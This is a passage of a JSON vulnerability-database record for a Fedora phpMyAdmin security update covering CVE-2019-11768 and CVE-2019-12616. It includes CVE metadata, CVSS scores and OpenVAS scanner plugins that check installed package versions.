{"id": "FEDORA:D6FAD604CBEE", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 30 Update: phpMyAdmin-4.9.0.1-1.fc30", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface (managing databases, tables, fields, relations, index es, users, permissions), while you still have the ability to directly execute a ny SQL statement. Features include an intuitive web interface, support for most MySQL features (browse and drop databases, tables, views, fields and indexes, create, copy, drop, rename and alter databases, tables, fields and indexes, maintenance server, databases and tables, with proposals on server configuration, execu te, edit and bookmark any SQL-statement, even batch-queries, manage MySQL users and privileges, manage stored procedures and triggers), import data from CSV and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T ext and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv ers, creating PDF graphics of your database layout, creating complex queries usi ng Query-by-example (QBE), searching globally in a database or a subset of it, transforming stored data into any format using a set of predefined function s, like displaying BLOB-data as image or download-link and much more... ", "published": "2019-06-14T00:55:17", "modified": "2019-06-14T00:55:17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2019-11768", "CVE-2019-12616"], "lastseen": "2020-12-21T08:17:55", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-12616", "CVE-2019-11768"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1861-1", "OPENSUSE-SU-2019:1689-1"]}, {"type": "nessus", "idList": ["OPENSUSE-2019-1689.NASL", "UBUNTU_USN-4639-1.NASL", "PHPMYADMIN_PMASA_2019_3.NASL", "FEDORA_2019-33649E2E64.NASL", "FREEBSD_PKG_A56810278E0311E985F46805CA0B3D42.NASL", "PHPMYADMIN_PMASA_2019_4.NASL", "FEDORA_2019-13D2BA0AED.NASL", "DEBIAN_DLA-1821.NASL"]}, {"type": "typo3", "idList": ["TYPO3-EXT-SA-2019-014"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142498", "OPENVAS:1361412562310876499", "OPENVAS:1361412562310140207", "OPENVAS:1361412562310876502", "OPENVAS:1361412562310891821", "OPENVAS:1361412562310876492", "OPENVAS:1361412562310876495", "OPENVAS:1361412562310852609", "OPENVAS:1361412562310142499", "OPENVAS:1361412562310142500"]}, {"type": "fedora", "idList": ["FEDORA:4E499617F90B", "FEDORA:8B6C26179A0D", "FEDORA:51FCE606181A"]}, {"type": "phpmyadmin", "idList": ["PHPMYADMIN:PMASA-2019-4", "PHPMYADMIN:PMASA-2019-3"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:81471032FA13FD77CD0746A8D3C15CC8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46982"]}, {"type": "freebsd", "idList": ["A5681027-8E03-11E9-85F4-6805CA0B3D42"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153251"]}, {"type": "zdt", "idList": ["1337DAY-ID-32859"]}, {"type": "ubuntu", "idList": ["USN-4639-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1821-1:AF0F6"]}], "modified": "2020-12-21T08:17:55", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2020-12-21T08:17:55", "rev": 2}, "vulnersScore": 5.4}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "30", "arch": "any", "packageName": "phpMyAdmin", "packageVersion": "4.9.0.1", "packageFilename": "UNKNOWN", "operator": "lt"}]}

{"cve": [{"lastseen": "2021-02-02T07:12:48", "description": "An issue was discovered in phpMyAdmin before 4.9.0.1. A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-05T05:29:00", "title": "CVE-2019-11768", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11768"], "modified": "2019-06-14T04:29:00", "cpe": [], "id": "CVE-2019-11768", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11768", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T07:12:49", "description": "An issue was discovered in phpMyAdmin before 4.9.0. A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) to the victim.", "edition": 12, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-06-05T05:29:00", "title": "CVE-2019-12616", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12616"], "modified": "2019-06-14T04:29:00", "cpe": [], "id": "CVE-2019-12616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "openvas": [{"lastseen": "2019-06-21T12:42:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "The remote host is missing an update for the\n ", "modified": "2019-06-20T00:00:00", "published": "2019-06-15T00:00:00", "id": "OPENVAS:1361412562310876499", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876499", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2019-33649e2e64", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876499\");\n script_version(\"2019-06-20T06:01:12+0000\");\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-20 06:01:12 +0000 (Thu, 20 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-15 02:09:59 +0000 (Sat, 15 Jun 2019)\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2019-33649e2e64\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-33649e2e64\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3PYUZ3AERVNKAMBBS7GSDPEEN5J65D6D\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'phpMyAdmin' package(s) announced via the FEDORA-2019-33649e2e64 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"phpMyAdmin is a tool written in PHP intended\n to handle the administration of MySQL over the World Wide Web. Most frequently\n used operations are supported by the user interface (managing databases, tables,\n fields, relations, indexes, users, permissions), while you still have the\n ability to directly execute any SQL statement.\n\nFeatures include an intuitive web interface, support for most MySQL features\n(browse and drop databases, tables, views, fields and indexes, create, copy,\ndrop, rename and alter databases, tables, fields and indexes, maintenance\nserver, databases and tables, with proposals on server configuration, execute,\nedit and bookmark any SQL-statement, even batch-queries, manage MySQL users\nand privileges, manage stored procedures and triggers), import data from CSV\nand SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\nand Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\ncreating PDF graphics of your database layout, creating complex queries using\nQuery-by-example (QBE), searching globally in a database or a subset of it,\ntransforming stored data into any format using a set of predefined functions,\nlike displaying BLOB-data as image or download-link and much more...\");\n\n script_tag(name:\"affected\", value:\"'phpMyAdmin' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.9.0.1~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T12:42:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "The remote host is missing an update for\n the ", "modified": "2019-06-20T00:00:00", "published": "2019-06-15T00:00:00", "id": "OPENVAS:1361412562310876502", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876502", "type": "openvas", "title": "Fedora Update for php-phpmyadmin-sql-parser FEDORA-2019-33649e2e64", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876502\");\n script_version(\"2019-06-20T06:01:12+0000\");\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-20 06:01:12 +0000 (Thu, 20 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-15 02:10:00 +0000 (Sat, 15 Jun 2019)\");\n script_name(\"Fedora Update for php-phpmyadmin-sql-parser FEDORA-2019-33649e2e64\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-33649e2e64\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKJMYVXEDXGEGRO42T6H6VOEZJ65QPQ7\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'php-phpmyadmin-sql-parser' package(s) announced via the\n FEDORA-2019-33649e2e64 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A validating SQL lexer and parser with a\n focus on MySQL dialect.\n\nThis library was originally developed for phpMyAdmin during\nthe Google Summer of Code 2015.\n\nAutoloader: /usr/share/php/PhpMyAdmin/SqlParser/autoload.php\");\n\n script_tag(name:\"affected\", value:\"'php-phpmyadmin-sql-parser' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php-phpmyadmin-sql-parser\", rpm:\"php-phpmyadmin-sql-parser~4.3.2~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-07-03T00:00:00", "id": "OPENVAS:1361412562310852609", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852609", "type": "openvas", "title": "openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2019:1689-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852609\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-03 02:00:44 +0000 (Wed, 03 Jul 2019)\");\n script_name(\"openSUSE: Security Advisory for phpMyAdmin (openSUSE-SU-2019:1689-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.3|openSUSELeap15\\.0)\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1689-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-07/msg00007.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the openSUSE-SU-2019:1689-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for phpMyAdmin fixes the following issues:\n\n phpMyAdmin was updated to 4.9.0.1:\n\n * Several issues with SYSTEM VERSIONING tables\n\n * Fixed json encode error in export\n\n * Fixed JavaScript events not activating on input (sql bookmark issue)\n\n * Show Designer combo boxes when adding a constraint\n\n * Fix edit view\n\n * Fixed invalid default value for bit field\n\n * Fix several errors relating to GIS data types\n\n * Fixed javascript error PMA_messages is not defined\n\n * Fixed import XML data with leading zeros\n\n * Fixed php notice, added support for 'DELETE HISTORY' table privilege\n (MariaDB >= 10.3.4)\n\n * Fixed MySQL 8.0.0 issues with GIS display\n\n * Fixed 'Server charset' in 'Database server' tab showing wrong information\n\n * Fixed can not copy user on Percona Server 5.7\n\n * Updated sql-parser to version 4.3.2, which fixes several parsing and\n linting problems\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-1689=1\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1689=1\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1689=1\n\n - openSUSE Backports SLE-15:\n\n zypper in -t patch openSUSE-2019-1689=1\n\n - SUSE Package Hub for SUSE Linux Enterprise 12:\n\n zypper in -t patch openSUSE-2019-1689=1\");\n\n script_tag(name:\"affected\", value:\"'phpMyAdmin' package(s) on openSUSE Leap 42.3, openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.9.0.1~31.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.9.0.1~lp150.31.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T12:42:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "The remote host is missing an update for\n the ", "modified": "2019-06-20T00:00:00", "published": "2019-06-14T00:00:00", "id": "OPENVAS:1361412562310876492", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876492", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2019-13d2ba0aed", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876492\");\n script_version(\"2019-06-20T06:01:12+0000\");\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-20 06:01:12 +0000 (Thu, 20 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-14 02:10:27 +0000 (Fri, 14 Jun 2019)\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2019-13d2ba0aed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-13d2ba0aed\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CM4IYKAYB2CGXWQ4SXDBP3TIAR5Y2YH2\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'phpMyAdmin' package(s) announced via the FEDORA-2019-13d2ba0aed advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"phpMyAdmin is a tool written in PHP intended\n to handle the administration of MySQL over the World Wide Web. Most frequently\n used operations are supported by the user interface (managing databases, tables,\n fields, relations, indexes, users, permissions), while you still have the ability\n to directly execute any SQL statement.\n\nFeatures include an intuitive web interface, support for most MySQL features\n(browse and drop databases, tables, views, fields and indexes, create, copy,\ndrop, rename and alter databases, tables, fields and indexes, maintenance\nserver, databases and tables, with proposals on server configuration, execute,\nedit and bookmark any SQL-statement, even batch-queries, manage MySQL users\nand privileges, manage stored procedures and triggers), import data from CSV\nand SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\nand Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\ncreating PDF graphics of your database layout, creating complex queries using\nQuery-by-example (QBE), searching globally in a database or a subset of it,\ntransforming stored data into any format using a set of predefined functions,\nlike displaying BLOB-data as image or download-link and much more...\");\n\n script_tag(name:\"affected\", value:\"'phpMyAdmin' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~4.9.0.1~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-21T12:42:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12616", "CVE-2019-11768"], "description": "The remote host is missing an update for the\n ", "modified": "2019-06-20T00:00:00", "published": "2019-06-14T00:00:00", "id": "OPENVAS:1361412562310876495", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876495", "type": "openvas", "title": "Fedora Update for php-phpmyadmin-sql-parser FEDORA-2019-13d2ba0aed", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876495\");\n script_version(\"2019-06-20T06:01:12+0000\");\n script_cve_id(\"CVE-2019-11768\", \"CVE-2019-12616\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-20 06:01:12 +0000 (Thu, 20 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-14 02:10:33 +0000 (Fri, 14 Jun 2019)\");\n script_name(\"Fedora Update for php-phpmyadmin-sql-parser FEDORA-2019-13d2ba0aed\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-13d2ba0aed\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/II4HC4QO6WUL2IRSQKCB66UBJOLLI5OV\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'php-phpmyadmin-sql-parser' package(s) announced via the FEDORA-2019-13d2ba0aed\n advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A validating SQL lexer and parser with a\n focus on MySQL dialect.\n\nThis library was originally developed for phpMyAdmin during\nthe Google Summer of Code 2015.\n\nAutoloader: /usr/share/php/PhpMyAdmin/SqlParser/autoload.php\");\n\n script_tag(name:\"affected\", value:\"'php-phpmyadmin-sql-parser' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php-phpmyadmin-sql-parser\", rpm:\"php-phpmyadmin-sql-parser~4.3.2~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-12T20:42:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11768"], "description": "phpMyAdmin is prone to an SQL injection vulnerability.", "modified": "2019-06-11T00:00:00", "published": "2019-06-11T00:00:00", "id": "OPENVAS:1361412562310140207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140207", "type": "openvas", "title": "phpMyAdmin < 4.8.6 SQL Injection Vulnerability - PMASA-2019-3 (Linux)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the 